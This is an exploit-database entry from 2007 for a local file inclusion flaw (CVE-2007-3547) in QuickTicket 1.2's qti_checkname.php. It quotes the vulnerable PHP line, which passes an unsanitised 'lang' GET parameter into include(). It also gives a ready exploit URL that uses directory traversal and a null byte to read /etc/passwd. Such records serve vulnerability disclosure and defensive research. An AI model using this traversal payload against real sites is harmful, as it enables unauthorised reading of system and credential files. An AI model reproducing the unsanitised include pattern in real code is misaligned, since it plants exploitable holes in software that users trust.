QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion
Author: Katatafish type: webapps platform: php port: date_added: 2007-06-26 date_updated: 2016-11-15 verified: 1 codes: OSVDB-37605;CVE-2007-3547 tags: aliases: screenshot_url: application_url: raw file: 4116.txt
###QuickTicket v1.2 Local File Inclusion### #download: http://www.qt-cute.org/download/qti12.zip #found by: katatafish (karatatata@hush.com) #vulncode: $strLang = $_GET["lang"]; include("language/$strLang/qtf_lang_reg.inc"); #exploit: http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00 #thanks:str0ke # milw0rm.com [2007-06-27]